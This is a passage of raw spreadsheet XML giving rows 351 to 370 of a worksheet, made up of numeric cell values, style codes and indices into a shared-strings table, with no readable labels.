        <v>1.0</v>
      </c>
      <c r="C351" s="14"/>
      <c r="D351" s="14"/>
      <c r="E351" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F351" s="14"/>
      <c r="G351" s="29">
        <v>3.0</v>
      </c>
      <c r="H351" s="29">
        <v>364.0</v>
      </c>
      <c r="I351" s="29">
        <v>147723.0</v>
      </c>
      <c r="J351" s="15"/>
      <c r="K351" s="29">
        <v>98538.0</v>
      </c>
      <c r="L351" s="15"/>
      <c r="M351" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N351" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O351" s="29">
        <v>1.0</v>
      </c>
      <c r="P351" s="29">
        <v>2.0</v>
      </c>
      <c r="Q351" s="15"/>
      <c r="R351" s="15"/>
      <c r="S351" s="15"/>
      <c r="T351" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U351" s="5"/>
      <c r="V351" s="5"/>
      <c r="W351" s="47"/>
      <c r="X351" s="45"/>
      <c r="Y351" s="45"/>
      <c r="Z351" s="38" t="s">
        <v>2130</v>
      </c>
      <c r="AA351" s="39" t="s">
        <v>2131</v>
      </c>
      <c r="AB351" s="38" t="s">
        <v>2132</v>
      </c>
      <c r="AC351" s="40">
        <v>159026.0</v>
      </c>
      <c r="AD351" s="5"/>
      <c r="AE351" s="14"/>
      <c r="AF351" s="14"/>
    </row>
    <row r="352">
      <c r="A352" s="6">
        <f t="shared" si="1"/>
        <v>0.6879077309</v>
      </c>
      <c r="B352" s="29">
        <v>1.0</v>
      </c>
      <c r="C352" s="15"/>
      <c r="D352" s="14"/>
      <c r="E352" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F352" s="14"/>
      <c r="G352" s="29">
        <v>0.0</v>
      </c>
      <c r="H352" s="29">
        <v>46.0</v>
      </c>
      <c r="I352" s="29">
        <v>264036.0</v>
      </c>
      <c r="J352" s="15"/>
      <c r="K352" s="29">
        <v>264036.0</v>
      </c>
      <c r="L352" s="15"/>
      <c r="M352" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N352" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O352" s="29">
        <v>0.0</v>
      </c>
      <c r="P352" s="29">
        <v>5.0</v>
      </c>
      <c r="Q352" s="15"/>
      <c r="R352" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S352" s="15"/>
      <c r="T352" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U352" s="5"/>
      <c r="V352" s="5"/>
      <c r="W352" s="47"/>
      <c r="X352" s="45"/>
      <c r="Y352" s="45"/>
      <c r="Z352" s="38" t="s">
        <v>2133</v>
      </c>
      <c r="AA352" s="39" t="s">
        <v>2134</v>
      </c>
      <c r="AB352" s="38" t="s">
        <v>2135</v>
      </c>
      <c r="AC352" s="40">
        <v>253818.0</v>
      </c>
      <c r="AD352" s="5"/>
      <c r="AE352" s="14"/>
      <c r="AF352" s="14"/>
    </row>
    <row r="353">
      <c r="A353" s="6">
        <f t="shared" si="1"/>
        <v>0.9785805368</v>
      </c>
      <c r="B353" s="29">
        <v>1.0</v>
      </c>
      <c r="C353" s="14"/>
      <c r="D353" s="14"/>
      <c r="E353" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F353" s="14"/>
      <c r="G353" s="29">
        <v>4.0</v>
      </c>
      <c r="H353" s="29">
        <v>1982.0</v>
      </c>
      <c r="I353" s="29">
        <v>169105.0</v>
      </c>
      <c r="J353" s="15"/>
      <c r="K353" s="29">
        <v>169105.0</v>
      </c>
      <c r="L353" s="15"/>
      <c r="M353" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N353" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O353" s="29">
        <v>0.0</v>
      </c>
      <c r="P353" s="29">
        <v>1.0</v>
      </c>
      <c r="Q353" s="15"/>
      <c r="R353" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S353" s="15"/>
      <c r="T353" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U353" s="5"/>
      <c r="V353" s="5"/>
      <c r="W353" s="47"/>
      <c r="X353" s="45"/>
      <c r="Y353" s="45"/>
      <c r="Z353" s="38" t="s">
        <v>2136</v>
      </c>
      <c r="AA353" s="39" t="s">
        <v>2137</v>
      </c>
      <c r="AB353" s="38" t="s">
        <v>2138</v>
      </c>
      <c r="AC353" s="40">
        <v>178202.0</v>
      </c>
      <c r="AD353" s="5"/>
      <c r="AE353" s="14"/>
      <c r="AF353" s="14"/>
    </row>
    <row r="354">
      <c r="A354" s="6">
        <f t="shared" si="1"/>
        <v>0.5936485613</v>
      </c>
      <c r="B354" s="29">
        <v>1.0</v>
      </c>
      <c r="C354" s="15"/>
      <c r="D354" s="14"/>
      <c r="E354" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F354" s="14"/>
      <c r="G354" s="29">
        <v>2.0</v>
      </c>
      <c r="H354" s="29">
        <v>53.0</v>
      </c>
      <c r="I354" s="29">
        <v>45285.0</v>
      </c>
      <c r="J354" s="15"/>
      <c r="K354" s="15"/>
      <c r="L354" s="15"/>
      <c r="M354" s="14"/>
      <c r="N354" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O354" s="29">
        <v>0.0</v>
      </c>
      <c r="P354" s="29">
        <v>3.0</v>
      </c>
      <c r="Q354" s="15"/>
      <c r="R354" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S354" s="15"/>
      <c r="T354" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U354" s="5"/>
      <c r="V354" s="5"/>
      <c r="W354" s="47"/>
      <c r="X354" s="45"/>
      <c r="Y354" s="45"/>
      <c r="Z354" s="38" t="s">
        <v>2139</v>
      </c>
      <c r="AA354" s="39" t="s">
        <v>2140</v>
      </c>
      <c r="AB354" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC354" s="40">
        <v>121764.0</v>
      </c>
      <c r="AD354" s="5"/>
      <c r="AE354" s="14"/>
      <c r="AF354" s="14"/>
    </row>
    <row r="355">
      <c r="A355" s="6">
        <f t="shared" si="1"/>
        <v>0.1521121934</v>
      </c>
      <c r="B355" s="29">
        <v>1.0</v>
      </c>
      <c r="C355" s="15"/>
      <c r="D355" s="14"/>
      <c r="E355" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F355" s="14"/>
      <c r="G355" s="29">
        <v>1.0</v>
      </c>
      <c r="H355" s="29">
        <v>71.0</v>
      </c>
      <c r="I355" s="29">
        <v>55534.0</v>
      </c>
      <c r="J355" s="15"/>
      <c r="K355" s="15"/>
      <c r="L355" s="15"/>
      <c r="M355" s="15"/>
      <c r="N355" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O355" s="29">
        <v>1.0</v>
      </c>
      <c r="P355" s="29">
        <v>0.0</v>
      </c>
      <c r="Q355" s="15"/>
      <c r="R355" s="15"/>
      <c r="S355" s="15"/>
      <c r="T355" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U355" s="5"/>
      <c r="V355" s="5"/>
      <c r="W355" s="47"/>
      <c r="X355" s="45"/>
      <c r="Y355" s="45"/>
      <c r="Z355" s="38" t="s">
        <v>2141</v>
      </c>
      <c r="AA355" s="39" t="s">
        <v>2142</v>
      </c>
      <c r="AB355" s="38" t="s">
        <v>1406</v>
      </c>
      <c r="AC355" s="40">
        <v>232413.0</v>
      </c>
      <c r="AD355" s="5"/>
      <c r="AE355" s="14"/>
      <c r="AF355" s="14"/>
    </row>
    <row r="356">
      <c r="A356" s="6">
        <f t="shared" si="1"/>
        <v>0.4123394622</v>
      </c>
      <c r="B356" s="29">
        <v>1.0</v>
      </c>
      <c r="C356" s="15"/>
      <c r="D356" s="14"/>
      <c r="E356" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F356" s="14"/>
      <c r="G356" s="29">
        <v>3.0</v>
      </c>
      <c r="H356" s="29">
        <v>208.0</v>
      </c>
      <c r="I356" s="29">
        <v>396.0</v>
      </c>
      <c r="J356" s="15"/>
      <c r="K356" s="29">
        <v>396.0</v>
      </c>
      <c r="L356" s="15"/>
      <c r="M356" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N356" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O356" s="29">
        <v>1.0</v>
      </c>
      <c r="P356" s="29">
        <v>4.0</v>
      </c>
      <c r="Q356" s="15"/>
      <c r="R356" s="15"/>
      <c r="S356" s="15"/>
      <c r="T356" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U356" s="5"/>
      <c r="V356" s="5"/>
      <c r="W356" s="47"/>
      <c r="X356" s="45"/>
      <c r="Y356" s="45"/>
      <c r="Z356" s="38" t="s">
        <v>2143</v>
      </c>
      <c r="AA356" s="39" t="s">
        <v>2144</v>
      </c>
      <c r="AB356" s="38" t="s">
        <v>2145</v>
      </c>
      <c r="AC356" s="40">
        <v>102116.0</v>
      </c>
      <c r="AD356" s="5"/>
      <c r="AE356" s="14"/>
      <c r="AF356" s="14"/>
    </row>
    <row r="357">
      <c r="A357" s="6">
        <f t="shared" si="1"/>
        <v>0.5329738947</v>
      </c>
      <c r="B357" s="29">
        <v>1.0</v>
      </c>
      <c r="C357" s="15"/>
      <c r="D357" s="14"/>
      <c r="E357" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F357" s="14"/>
      <c r="G357" s="29">
        <v>67.0</v>
      </c>
      <c r="H357" s="29">
        <v>98691.0</v>
      </c>
      <c r="I357" s="29">
        <v>3222.0</v>
      </c>
      <c r="J357" s="15"/>
      <c r="K357" s="15"/>
      <c r="L357" s="15"/>
      <c r="M357" s="15"/>
      <c r="N357" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O357" s="29">
        <v>4.0</v>
      </c>
      <c r="P357" s="29">
        <v>8.0</v>
      </c>
      <c r="Q357" s="15"/>
      <c r="R357" s="15"/>
      <c r="S357" s="15"/>
      <c r="T357" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U357" s="5"/>
      <c r="V357" s="5"/>
      <c r="W357" s="47"/>
      <c r="X357" s="45"/>
      <c r="Y357" s="45"/>
      <c r="Z357" s="38" t="s">
        <v>2146</v>
      </c>
      <c r="AA357" s="39" t="s">
        <v>2147</v>
      </c>
      <c r="AB357" s="38" t="s">
        <v>2148</v>
      </c>
      <c r="AC357" s="40">
        <v>152854.0</v>
      </c>
      <c r="AD357" s="5"/>
      <c r="AE357" s="14"/>
      <c r="AF357" s="14"/>
    </row>
    <row r="358">
      <c r="A358" s="6">
        <f t="shared" si="1"/>
        <v>0.5924106304</v>
      </c>
      <c r="B358" s="29">
        <v>1.0</v>
      </c>
      <c r="C358" s="15"/>
      <c r="D358" s="14"/>
      <c r="E358" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F358" s="14"/>
      <c r="G358" s="29">
        <v>6.0</v>
      </c>
      <c r="H358" s="29">
        <v>787.0</v>
      </c>
      <c r="I358" s="29">
        <v>8661.0</v>
      </c>
      <c r="J358" s="15"/>
      <c r="K358" s="29">
        <v>414.0</v>
      </c>
      <c r="L358" s="15"/>
      <c r="M358" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N358" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O358" s="29">
        <v>1.0</v>
      </c>
      <c r="P358" s="29">
        <v>1.0</v>
      </c>
      <c r="Q358" s="15"/>
      <c r="R358" s="15"/>
      <c r="S358" s="15"/>
      <c r="T358" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U358" s="5"/>
      <c r="V358" s="5"/>
      <c r="W358" s="47"/>
      <c r="X358" s="45"/>
      <c r="Y358" s="45"/>
      <c r="Z358" s="38" t="s">
        <v>2149</v>
      </c>
      <c r="AA358" s="39" t="s">
        <v>2150</v>
      </c>
      <c r="AB358" s="38" t="s">
        <v>2151</v>
      </c>
      <c r="AC358" s="40">
        <v>13059.0</v>
      </c>
      <c r="AD358" s="5"/>
      <c r="AE358" s="14"/>
      <c r="AF358" s="14"/>
    </row>
    <row r="359">
      <c r="A359" s="6">
        <f t="shared" si="1"/>
        <v>0.3504526779</v>
      </c>
      <c r="B359" s="29">
        <v>1.0</v>
      </c>
      <c r="C359" s="14"/>
      <c r="D359" s="14"/>
      <c r="E359" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F359" s="14"/>
      <c r="G359" s="29">
        <v>2.0</v>
      </c>
      <c r="H359" s="29">
        <v>123.0</v>
      </c>
      <c r="I359" s="29">
        <v>42068.0</v>
      </c>
      <c r="J359" s="15"/>
      <c r="K359" s="29">
        <v>139477.0</v>
      </c>
      <c r="L359" s="15"/>
      <c r="M359" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N359" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O359" s="29">
        <v>0.0</v>
      </c>
      <c r="P359" s="29">
        <v>0.0</v>
      </c>
      <c r="Q359" s="15"/>
      <c r="R359" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S359" s="15"/>
      <c r="T359" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U359" s="5"/>
      <c r="V359" s="5"/>
      <c r="W359" s="47"/>
      <c r="X359" s="45"/>
      <c r="Y359" s="45"/>
      <c r="Z359" s="38" t="s">
        <v>2152</v>
      </c>
      <c r="AA359" s="39" t="s">
        <v>2153</v>
      </c>
      <c r="AB359" s="38" t="s">
        <v>2154</v>
      </c>
      <c r="AC359" s="40">
        <v>166621.0</v>
      </c>
      <c r="AD359" s="5"/>
      <c r="AE359" s="14"/>
      <c r="AF359" s="14"/>
    </row>
    <row r="360">
      <c r="A360" s="6">
        <f t="shared" si="1"/>
        <v>0.730220498</v>
      </c>
      <c r="B360" s="29">
        <v>1.0</v>
      </c>
      <c r="C360" s="29">
        <v>158793.0</v>
      </c>
      <c r="D360" s="14"/>
      <c r="E360" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F360" s="14"/>
      <c r="G360" s="29">
        <v>3.0</v>
      </c>
      <c r="H360" s="29">
        <v>155.0</v>
      </c>
      <c r="I360" s="29">
        <v>25993.0</v>
      </c>
      <c r="J360" s="15"/>
      <c r="K360" s="15"/>
      <c r="L360" s="15"/>
      <c r="M360" s="14"/>
      <c r="N360" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O360" s="29">
        <v>2.0</v>
      </c>
      <c r="P360" s="29">
        <v>0.0</v>
      </c>
      <c r="Q360" s="15"/>
      <c r="R360" s="15"/>
      <c r="S360" s="15"/>
      <c r="T360" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U360" s="5"/>
      <c r="V360" s="5"/>
      <c r="W360" s="47"/>
      <c r="X360" s="45"/>
      <c r="Y360" s="45"/>
      <c r="Z360" s="38" t="s">
        <v>2155</v>
      </c>
      <c r="AA360" s="39" t="s">
        <v>2156</v>
      </c>
      <c r="AB360" s="38" t="s">
        <v>2157</v>
      </c>
      <c r="AC360" s="40">
        <v>158787.0</v>
      </c>
      <c r="AD360" s="5"/>
      <c r="AE360" s="14"/>
      <c r="AF360" s="14"/>
    </row>
    <row r="361">
      <c r="A361" s="6">
        <f t="shared" si="1"/>
        <v>0.08121907926</v>
      </c>
      <c r="B361" s="29">
        <v>1.0</v>
      </c>
      <c r="C361" s="15"/>
      <c r="D361" s="14"/>
      <c r="E361" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F361" s="14"/>
      <c r="G361" s="29">
        <v>2.0</v>
      </c>
      <c r="H361" s="29">
        <v>2630.0</v>
      </c>
      <c r="I361" s="29">
        <v>115653.0</v>
      </c>
      <c r="J361" s="15"/>
      <c r="K361" s="29">
        <v>98538.0</v>
      </c>
      <c r="L361" s="15"/>
      <c r="M361" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N361" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O361" s="29">
        <v>2.0</v>
      </c>
      <c r="P361" s="29">
        <v>0.0</v>
      </c>
      <c r="Q361" s="15"/>
      <c r="R361" s="15"/>
      <c r="S361" s="15"/>
      <c r="T361" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U361" s="5"/>
      <c r="V361" s="5"/>
      <c r="W361" s="47"/>
      <c r="X361" s="45"/>
      <c r="Y361" s="45"/>
      <c r="Z361" s="38" t="s">
        <v>2158</v>
      </c>
      <c r="AA361" s="39" t="s">
        <v>2159</v>
      </c>
      <c r="AB361" s="38" t="s">
        <v>1451</v>
      </c>
      <c r="AC361" s="40">
        <v>152000.0</v>
      </c>
      <c r="AD361" s="5"/>
      <c r="AE361" s="14"/>
      <c r="AF361" s="14"/>
    </row>
    <row r="362">
      <c r="A362" s="6">
        <f t="shared" si="1"/>
        <v>0.1232562845</v>
      </c>
      <c r="B362" s="29">
        <v>1.0</v>
      </c>
      <c r="C362" s="14"/>
      <c r="D362" s="14"/>
      <c r="E362" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F362" s="14"/>
      <c r="G362" s="29">
        <v>2.0</v>
      </c>
      <c r="H362" s="29">
        <v>556.0</v>
      </c>
      <c r="I362" s="29">
        <v>31625.0</v>
      </c>
      <c r="J362" s="15"/>
      <c r="K362" s="15"/>
      <c r="L362" s="15"/>
      <c r="M362" s="14"/>
      <c r="N362" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O362" s="29">
        <v>4.0</v>
      </c>
      <c r="P362" s="29">
        <v>7.0</v>
      </c>
      <c r="Q362" s="15"/>
      <c r="R362" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S362" s="15"/>
      <c r="T362" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U362" s="5"/>
      <c r="V362" s="5"/>
      <c r="W362" s="47"/>
      <c r="X362" s="45"/>
      <c r="Y362" s="45"/>
      <c r="Z362" s="38" t="s">
        <v>2160</v>
      </c>
      <c r="AA362" s="39" t="s">
        <v>2161</v>
      </c>
      <c r="AB362" s="38" t="s">
        <v>2162</v>
      </c>
      <c r="AC362" s="40">
        <v>61292.0</v>
      </c>
      <c r="AD362" s="5"/>
      <c r="AE362" s="14"/>
      <c r="AF362" s="14"/>
    </row>
    <row r="363">
      <c r="A363" s="6">
        <f t="shared" si="1"/>
        <v>0.1882968921</v>
      </c>
      <c r="B363" s="29">
        <v>1.0</v>
      </c>
      <c r="C363" s="14"/>
      <c r="D363" s="14"/>
      <c r="E363" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F363" s="14"/>
      <c r="G363" s="29">
        <v>10.0</v>
      </c>
      <c r="H363" s="29">
        <v>8362.0</v>
      </c>
      <c r="I363" s="29">
        <v>396.0</v>
      </c>
      <c r="J363" s="15"/>
      <c r="K363" s="29">
        <v>-1.0</v>
      </c>
      <c r="L363" s="15"/>
      <c r="M363" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N363" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O363" s="29">
        <v>4.0</v>
      </c>
      <c r="P363" s="29">
        <v>6.0</v>
      </c>
      <c r="Q363" s="29">
        <v>0.0</v>
      </c>
      <c r="R363" s="15"/>
      <c r="S363" s="15"/>
      <c r="T363" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U363" s="5"/>
      <c r="V363" s="5"/>
      <c r="W363" s="47"/>
      <c r="X363" s="45"/>
      <c r="Y363" s="45"/>
      <c r="Z363" s="38" t="s">
        <v>2163</v>
      </c>
      <c r="AA363" s="39" t="s">
        <v>2164</v>
      </c>
      <c r="AB363" s="38" t="s">
        <v>2165</v>
      </c>
      <c r="AC363" s="40">
        <v>12555.0</v>
      </c>
      <c r="AD363" s="5"/>
      <c r="AE363" s="14"/>
      <c r="AF363" s="14"/>
    </row>
    <row r="364">
      <c r="A364" s="6">
        <f t="shared" si="1"/>
        <v>0.318179431</v>
      </c>
      <c r="B364" s="29">
        <v>1.0</v>
      </c>
      <c r="C364" s="15"/>
      <c r="D364" s="14"/>
      <c r="E364" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F364" s="14"/>
      <c r="G364" s="29">
        <v>88.0</v>
      </c>
      <c r="H364" s="29">
        <v>15633.0</v>
      </c>
      <c r="I364" s="29">
        <v>106510.0</v>
      </c>
      <c r="J364" s="15"/>
      <c r="K364" s="29">
        <v>106510.0</v>
      </c>
      <c r="L364" s="15"/>
      <c r="M364" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N364" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O364" s="29">
        <v>12.0</v>
      </c>
      <c r="P364" s="29">
        <v>3.0</v>
      </c>
      <c r="Q364" s="15"/>
      <c r="R364" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S364" s="15"/>
      <c r="T364" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U364" s="5"/>
      <c r="V364" s="5"/>
      <c r="W364" s="47"/>
      <c r="X364" s="45"/>
      <c r="Y364" s="45"/>
      <c r="Z364" s="38" t="s">
        <v>2166</v>
      </c>
      <c r="AA364" s="39" t="s">
        <v>2167</v>
      </c>
      <c r="AB364" s="38" t="s">
        <v>2168</v>
      </c>
      <c r="AC364" s="40">
        <v>207389.0</v>
      </c>
      <c r="AD364" s="5"/>
      <c r="AE364" s="14"/>
      <c r="AF364" s="14"/>
    </row>
    <row r="365">
      <c r="A365" s="6">
        <f t="shared" si="1"/>
        <v>0.9645642126</v>
      </c>
      <c r="B365" s="29">
        <v>1.0</v>
      </c>
      <c r="C365" s="29">
        <v>118402.0</v>
      </c>
      <c r="D365" s="14"/>
      <c r="E365" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F365" s="14"/>
      <c r="G365" s="29">
        <v>1.0</v>
      </c>
      <c r="H365" s="29">
        <v>1097.0</v>
      </c>
      <c r="I365" s="29">
        <v>43948.0</v>
      </c>
      <c r="J365" s="15"/>
      <c r="K365" s="29">
        <v>86652.0</v>
      </c>
      <c r="L365" s="15"/>
      <c r="M365" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N365" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O365" s="29">
        <v>1.0</v>
      </c>
      <c r="P365" s="29">
        <v>0.0</v>
      </c>
      <c r="Q365" s="15"/>
      <c r="R365" s="15"/>
      <c r="S365" s="15"/>
      <c r="T365" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U365" s="5"/>
      <c r="V365" s="5"/>
      <c r="W365" s="47"/>
      <c r="X365" s="45"/>
      <c r="Y365" s="45"/>
      <c r="Z365" s="38" t="s">
        <v>2169</v>
      </c>
      <c r="AA365" s="39" t="s">
        <v>2170</v>
      </c>
      <c r="AB365" s="38" t="s">
        <v>2171</v>
      </c>
      <c r="AC365" s="40">
        <v>118400.0</v>
      </c>
      <c r="AD365" s="5"/>
      <c r="AE365" s="14"/>
      <c r="AF365" s="14"/>
    </row>
    <row r="366">
      <c r="A366" s="6">
        <f t="shared" si="1"/>
        <v>0.8279081179</v>
      </c>
      <c r="B366" s="29">
        <v>1.0</v>
      </c>
      <c r="C366" s="15"/>
      <c r="D366" s="14"/>
      <c r="E366" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F366" s="14"/>
      <c r="G366" s="29">
        <v>-1.0</v>
      </c>
      <c r="H366" s="29">
        <v>287.0</v>
      </c>
      <c r="I366" s="29">
        <v>186084.0</v>
      </c>
      <c r="J366" s="15"/>
      <c r="K366" s="29">
        <v>6253.0</v>
      </c>
      <c r="L366" s="15"/>
      <c r="M366" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N366" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O366" s="29">
        <v>1.0</v>
      </c>
      <c r="P366" s="29">
        <v>0.0</v>
      </c>
      <c r="Q366" s="15"/>
      <c r="R366" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S366" s="15"/>
      <c r="T366" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U366" s="5"/>
      <c r="V366" s="5"/>
      <c r="W366" s="47"/>
      <c r="X366" s="45"/>
      <c r="Y366" s="45"/>
      <c r="Z366" s="38" t="s">
        <v>2172</v>
      </c>
      <c r="AA366" s="39" t="s">
        <v>2173</v>
      </c>
      <c r="AB366" s="38" t="s">
        <v>2174</v>
      </c>
      <c r="AC366" s="40">
        <v>193532.0</v>
      </c>
      <c r="AD366" s="5"/>
      <c r="AE366" s="14"/>
      <c r="AF366" s="14"/>
    </row>
    <row r="367">
      <c r="A367" s="6">
        <f t="shared" si="1"/>
        <v>0.2042429572</v>
      </c>
      <c r="B367" s="29">
        <v>1.0</v>
      </c>
      <c r="C367" s="29">
        <v>157920.0</v>
      </c>
      <c r="D367" s="14"/>
      <c r="E367" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F367" s="14"/>
      <c r="G367" s="29">
        <v>6.0</v>
      </c>
      <c r="H367" s="29">
        <v>2334.0</v>
      </c>
      <c r="I367" s="29">
        <v>110981.0</v>
      </c>
      <c r="J367" s="15"/>
      <c r="K367" s="15"/>
      <c r="L367" s="15"/>
      <c r="M367" s="15"/>
      <c r="N367" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O367" s="29">
        <v>1.0</v>
      </c>
      <c r="P367" s="29">
        <v>0.0</v>
      </c>
      <c r="Q367" s="15"/>
      <c r="R367" s="15"/>
      <c r="S367" s="15"/>
      <c r="T367" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U367" s="5"/>
      <c r="V367" s="5"/>
      <c r="W367" s="47"/>
      <c r="X367" s="45"/>
      <c r="Y367" s="45"/>
      <c r="Z367" s="38" t="s">
        <v>2175</v>
      </c>
      <c r="AA367" s="39" t="s">
        <v>2176</v>
      </c>
      <c r="AB367" s="38" t="s">
        <v>2177</v>
      </c>
      <c r="AC367" s="40">
        <v>157918.0</v>
      </c>
      <c r="AD367" s="5"/>
      <c r="AE367" s="14"/>
      <c r="AF367" s="14"/>
    </row>
    <row r="368">
      <c r="A368" s="6">
        <f t="shared" si="1"/>
        <v>0.532174024</v>
      </c>
      <c r="B368" s="29">
        <v>1.0</v>
      </c>
      <c r="C368" s="15"/>
      <c r="D368" s="14"/>
      <c r="E368" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F368" s="14"/>
      <c r="G368" s="29">
        <v>8.0</v>
      </c>
      <c r="H368" s="29">
        <v>1081.0</v>
      </c>
      <c r="I368" s="29">
        <v>119116.0</v>
      </c>
      <c r="J368" s="15"/>
      <c r="K368" s="29">
        <v>98538.0</v>
      </c>
      <c r="L368" s="15"/>
      <c r="M368" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N368" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O368" s="29">
        <v>1.0</v>
      </c>
      <c r="P368" s="29">
        <v>3.0</v>
      </c>
      <c r="Q368" s="15"/>
      <c r="R368" s="15"/>
      <c r="S368" s="15"/>
      <c r="T368" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U368" s="5"/>
      <c r="V368" s="5"/>
      <c r="W368" s="47"/>
      <c r="X368" s="45"/>
      <c r="Y368" s="45"/>
      <c r="Z368" s="38" t="s">
        <v>2178</v>
      </c>
      <c r="AA368" s="39" t="s">
        <v>2179</v>
      </c>
      <c r="AB368" s="38" t="s">
        <v>2180</v>
      </c>
      <c r="AC368" s="40">
        <v>187865.0</v>
      </c>
      <c r="AD368" s="5"/>
      <c r="AE368" s="14"/>
      <c r="AF368" s="14"/>
    </row>
    <row r="369">
      <c r="A369" s="6">
        <f t="shared" si="1"/>
        <v>0.1768760299</v>
      </c>
      <c r="B369" s="29">
        <v>1.0</v>
      </c>
      <c r="C369" s="29">
        <v>239612.0</v>
      </c>
      <c r="D369" s="14"/>
      <c r="E369" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F369" s="14"/>
      <c r="G369" s="29">
        <v>1.0</v>
      </c>
      <c r="H369" s="29">
        <v>5900.0</v>
      </c>
      <c r="I369" s="29">
        <v>5947.0</v>
      </c>
      <c r="J369" s="15"/>
      <c r="K369" s="15"/>
      <c r="L369" s="15"/>
      <c r="M369" s="15"/>
      <c r="N369" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O369" s="29">
        <v>1.0</v>
      </c>
      <c r="P369" s="29">
        <v>2.0</v>
      </c>
      <c r="Q369" s="15"/>
      <c r="R369" s="15"/>
      <c r="S369" s="15"/>
      <c r="T369" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U369" s="5"/>
      <c r="V369" s="5"/>
      <c r="W369" s="47"/>
      <c r="X369" s="45"/>
      <c r="Y369" s="45"/>
      <c r="Z369" s="38" t="s">
        <v>2181</v>
      </c>
      <c r="AA369" s="39" t="s">
        <v>2182</v>
      </c>
      <c r="AB369" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC369" s="40">
        <v>239205.0</v>
      </c>
      <c r="AD369" s="5"/>
      <c r="AE369" s="14"/>
      <c r="AF369" s="14"/>
    </row>
    <row r="370">
      <c r="A370" s="6">
        <f t="shared" si="1"/>
        <v>0.8013541644</v>
      </c>
      <c r="B370" s="29">
        <v>1.0</v>
      </c>
      <c r="C370" s="29">
        <v>30253.0</v>
      </c>
      <c r="D370" s="14"/>
      <c r="E370" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F370" s="14"/>
      <c r="G370" s="29">
        <v>56.0</v>
      </c>
      <c r="H370" s="29">
        <v>23999.0</v>
      </c>
      <c r="I370" s="29">
        <v>20368.0</v>
      </c>
      <c r="J370" s="15"/>
      <c r="K370" s="29">
        <v>33.0</v>
      </c>
      <c r="L370" s="15"/>
      <c r="M370" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N370" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O370" s="29">
        <v>6.0</v>
      </c>
      <c r="P370" s="29">
        <v>5.0</v>
      </c>
      <c r="Q370" s="15"/>
      <c r="R370" s="15"/>
      <c r="S370" s="15"/>
      <c r="T370" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U370" s="5"/>
      <c r="V370" s="5"/>
      <c r="W370" s="47"/>
      <c r="X370" s="45"/>
